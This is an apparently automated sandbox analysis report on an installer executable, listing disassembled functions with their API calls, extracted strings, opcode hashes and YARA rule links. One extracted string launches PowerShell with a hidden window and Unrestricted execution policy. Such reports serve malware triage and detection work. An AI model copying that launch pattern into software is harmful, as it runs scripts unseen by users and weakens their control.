                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7e46297a48ff9db25e03dff955fc62427b0bb428c003285b4bdda79b12902fe9
                                                                                                                                                                              • Instruction ID: 25ea36a6e7e10c9b5a6661803200d5f20a0367a1271934c78044f73cb75bae46
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e46297a48ff9db25e03dff955fc62427b0bb428c003285b4bdda79b12902fe9
                                                                                                                                                                              • Instruction Fuzzy Hash: 55218BB0801748CFD710CF58C90478AFBF4FB09314F11869ED455AB791E3B9AA48CB90
                                                                                                                                                                              Function 00BB9920 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 406abc7e38223dcb54e7df03a9ae98a766efb6af6c0cfb33fca2ac158471cf2b
                                                                                                                                                                              • Instruction ID: 9faf3d999b1e4e7161af85b6a64a26933250a09caab1e2bd520ca959072fe2df
                                                                                                                                                                              • Opcode Fuzzy Hash: 406abc7e38223dcb54e7df03a9ae98a766efb6af6c0cfb33fca2ac158471cf2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 372177B0800788CFD710CF59C90478ABBF4FB09314F1086AED445AB7A1E3B9AA48CB90
                                                                                                                                                                              Function 00BD6FE0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 80065d94ab8f885320a65f4d62d2493f4ebb349b1a266538e0657c3955fe56e3
                                                                                                                                                                              • Instruction ID: 4310b22a60948e7cb937a6e08f3bdca77752f7eab8d961454570928078fa1332
                                                                                                                                                                              • Opcode Fuzzy Hash: 80065d94ab8f885320a65f4d62d2493f4ebb349b1a266538e0657c3955fe56e3
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C1100B1905208DFC740CF58C544789BBF4FB09328F2086AEE8189B381D3769A0ACF80
                                                                                                                                                                              Function 00D9A090 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                              • Instruction ID: 55039705ce78f9f4c59ca58816b998b6e8b4fd138b36a5c6f8b305b73f68d1b5
                                                                                                                                                                              • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                              • Instruction Fuzzy Hash: 56E0EC72A11238EBCF25DBDCCA4499AF3ECEB49B50B15449AF505D3251C670DE40C7E2
                                                                                                                                                                              Function 00D8B54A Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                                                                                              • Instruction ID: f4dc1c429b8620766c779f902f18b856ac948548f465c5a3dc565a18f37b5255
                                                                                                                                                                              • Opcode Fuzzy Hash: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                                                                                              • Instruction Fuzzy Hash: 4CC08C342009008ACE6AE92492713A83354E3D6B92F8804CED4060B752C61EDC82D731
                                                                                                                                                                              Function 00CDBA30 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 199COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetActiveWindow.USER32 ref: 00CDBB81
                                                                                                                                                                              • GetForegroundWindow.USER32(?,00CE41E9), ref: 00CDBB91
                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00CDBBCB
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(?,02141699,?,?,?,000000FF,?,00CE41E9,?), ref: 00CDBC1F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundInit_thread_footer$ActiveDebugHeapOutputProcessString
                                                                                                                                                                              • String ID: "%s" TRANSFORMS="%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ %s $ /x %s $ AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ MSINEWINSTANCE=1 $ REINSTALL=ALL REINSTALLMODE=vomus $ TRANSFORMS="%s" AI_INST_MAJORUPGRADE=1$ TRANSFORMS=":%s.mst;%s" MSINEWINSTANCE=1 $ TRANSFORMS=:%s.mst MSINEWINSTANCE=1 $,j$.msi$.mst$inst$majorupgrade-content.mst
                                                                                                                                                                              • API String ID: 1401059542-1006386134
                                                                                                                                                                              • Opcode ID: f60b40eb15960a395360afbb68b45fe766c8c52380f51477ceb71022fd35fa27
                                                                                                                                                                              • Instruction ID: f50b1925374747ee1357ee3e905c675f485f6b35f40fdde3f0a3e9e58f7c4734
                                                                                                                                                                              • Opcode Fuzzy Hash: f60b40eb15960a395360afbb68b45fe766c8c52380f51477ceb71022fd35fa27
                                                                                                                                                                              • Instruction Fuzzy Hash: 90612475A00205DFDB14DF69C8057AEBBF4EF45320F1582AEE925A7391EB309E05CBA0
                                                                                                                                                                              Function 00D06DB0 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 335COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 00D06F0F
                                                                                                                                                                              • Unable to retrieve PowerShell output from file: , xrefs: 00D0710E
                                                                                                                                                                              • Unable to get a temp file for script output, temp path: , xrefs: 00D06EBF
                                                                                                                                                                              • txt, xrefs: 00D06E83
                                                                                                                                                                              • ps1, xrefs: 00D06E56, 00D06E68, 00D06E72
                                                                                                                                                                              • Unable to find file , xrefs: 00D06DE3
                                                                                                                                                                              • Unable to create process: , xrefs: 00D06FB4
                                                                                                                                                                              • Unable to retrieve exit code from process., xrefs: 00D07131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                                                                                                                                              • API String ID: 0-4129021124
                                                                                                                                                                              • Opcode ID: eece98acb44d0108538568d2fc0b2642d2edd8a67124e45cc429edad752ad1db
                                                                                                                                                                              • Instruction ID: 513d7c94e0a202178d783b4d82a8be84c9147ef2bff79b7843d6377a028d5d0b
                                                                                                                                                                              • Opcode Fuzzy Hash: eece98acb44d0108538568d2fc0b2642d2edd8a67124e45cc429edad752ad1db
                                                                                                                                                                              • Instruction Fuzzy Hash: 47C1AC71D04609EFDB10DFA8CD05BAEBBF4EF09310F248259E514AB2D1DB75AA44CBA1
                                                                                                                                                                              Function 00CD5500 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 414libraryloaderthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA47AC,02141699,00000000), ref: 00CD56A3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA47AC,02141699), ref: 00CD56B8
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CD56C5
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00CD56D3
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD576D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD5774
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD5788
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD59BE
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA47AC,?,00000000), ref: 00CD5AFC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                              • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                              • API String ID: 1326996155-981128330
                                                                                                                                                                              • Opcode ID: 245108adbdce9602e360090e5ac50b1222618ce2f6ca46a83176a765f4310db5
                                                                                                                                                                              • Instruction ID: 298ba919e28df6baeac5ffd37427e7825cde84ef86fcb0f9f26072e6b54e329a
                                                                                                                                                                              • Opcode Fuzzy Hash: 245108adbdce9602e360090e5ac50b1222618ce2f6ca46a83176a765f4310db5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF100719006589FDB24DF24CC88BAEBBB5EF45300F2042EAE519A7391EB745B85CF60
                                                                                                                                                                              Function 00CD5630 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 296libraryloaderthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA47AC,02141699,00000000), ref: 00CD56A3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA47AC,02141699), ref: 00CD56B8
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CD56C5
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00CD56D3
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD576D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD5774
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD5788
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD59BE
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA47AC,?,00000000), ref: 00CD5AFC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                              • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                              • API String ID: 1326996155-981128330
                                                                                                                                                                              • Opcode ID: 92f028a04e93bacb3e53c6a0a13fb2ad46b796ac649490c4317d1b7825749719
                                                                                                                                                                              • Instruction ID: 08d9e2d0bd83bfbd02efe82c1071996f2ef6d1b8adbb34a51fcd3093f9f1a90d
                                                                                                                                                                              • Opcode Fuzzy Hash: 92f028a04e93bacb3e53c6a0a13fb2ad46b796ac649490c4317d1b7825749719
                                                                                                                                                                              • Instruction Fuzzy Hash: 9FD1BA70900668DFDB24DB64CC89BEEBBB4AF45301F1042EAE549B7291DB746B85CF60
                                                                                                                                                                              Function 00BB8CA0 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 460stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000507,02141699), ref: 00BB8D2E
                                                                                                                                                                              • IsWindow.USER32(?), ref: 00BB8D40
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BB8D81
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,#32770), ref: 00BB8DA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ParentRedrawlstrcmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 3033045798-463685578
                                                                                                                                                                              • Opcode ID: 267227465962e8ca6580cdeac681cfaaab93ac0554a42ac9976f7bade3380d2e
                                                                                                                                                                              • Instruction ID: 525679a59eb0f45dfa9ff60e4ccb6cc84c641e034416607231bd42c5f5c8d526
                                                                                                                                                                              • Opcode Fuzzy Hash: 267227465962e8ca6580cdeac681cfaaab93ac0554a42ac9976f7bade3380d2e
                                                                                                                                                                              • Instruction Fuzzy Hash: D2028E70A00209EFDB14DFA8C848BEEBBF9EF49314F144599F515E7290DBB59944CB60
                                                                                                                                                                              Function 00CC76D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 390libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,02141699,?,00000000), ref: 00CC7761
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC778F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00CC77A5
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CC77BE
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC77CB
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC79B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC7A1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                                                                                                                              • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                              • API String ID: 3460774402-1129428314
                                                                                                                                                                              • Opcode ID: f3b253a42e3a02f835fecf7fdbbefc88df16fb94cf50995b5e065f9becb92fa5
                                                                                                                                                                              • Instruction ID: cdc7d3bb30cb49d0c10d8ca24c22ea7e33547cd59e4efebd0dd9b9e108aeb7f5
                                                                                                                                                                              • Opcode Fuzzy Hash: f3b253a42e3a02f835fecf7fdbbefc88df16fb94cf50995b5e065f9becb92fa5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF157B1C05209AFDB10DF94C945BEEBBB4FF04310F248229E915B7290E775AA59CFA1
                                                                                                                                                                              Function 00BD64A0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,02141699), ref: 00BD6528
                                                                                                                                                                                • Part of subcall function 00BB83A0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BB83D6
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00BD662B
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00BD663F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00BD6654
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00BD6669
                                                                                                                                                                              • GetWindowTextLengthW.USER32(?), ref: 00BD6670
                                                                                                                                                                              • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00BD6680
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00BD66A0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BD66B2
                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00BD66C2
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00BD6714
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00BD6724
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$Rect$ClientCreateLengthLongScreenText
                                                                                                                                                                              • String ID: tooltips_class32
                                                                                                                                                                              • API String ID: 2480742200-1918224756
                                                                                                                                                                              • Opcode ID: 109337467920e993bb39acf791b4bd8d1eaaec75b324c3daefe1c3823b16fa80
                                                                                                                                                                              • Instruction ID: 5fbcc12dda832b9063076462fbfdf3b736c5d2dbf85798540f62018f6a7306a0
                                                                                                                                                                              • Opcode Fuzzy Hash: 109337467920e993bb39acf791b4bd8d1eaaec75b324c3daefe1c3823b16fa80
